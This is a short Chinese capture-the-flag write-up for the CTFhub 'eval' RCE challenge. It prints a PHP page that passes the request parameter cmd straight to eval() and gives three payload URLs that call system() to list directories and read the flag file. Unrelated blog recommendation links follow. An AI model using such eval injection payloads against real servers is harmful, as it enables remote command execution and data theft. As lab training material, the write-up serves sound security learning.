CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
编程大师哥4 分钟前
vxe-table 透视表分组汇总及排序基础配置
java
8***848218 分钟前
spring security 超详细使用教程(接入springboot、前后端分离)
java·spring boot·spring
9***J62820 分钟前
Spring Boot项目集成Redisson 原始依赖与 Spring Boot Starter 的流程
java·spring boot·后端
小小前端要继续努力27 分钟前
渐进增强、优雅降级及现代Web开发技术详解
前端
M***Z21031 分钟前
SQL 建表语句详解
java·数据库·sql
v***79432 分钟前
Spring Boot 热部署
java·spring boot·后端
执笔论英雄32 分钟前
【RL】python协程
java·网络·人工智能·python·设计模式
galaxyffang43 分钟前
认证、会话管理、授权的区别
java
未名编程1 小时前
Windows 下如何部署 Nacos 并导入配置文件
java·windows
boonya1 小时前
Java中Plugin设计模式的规范应用
java·spring·设计模式·插件模式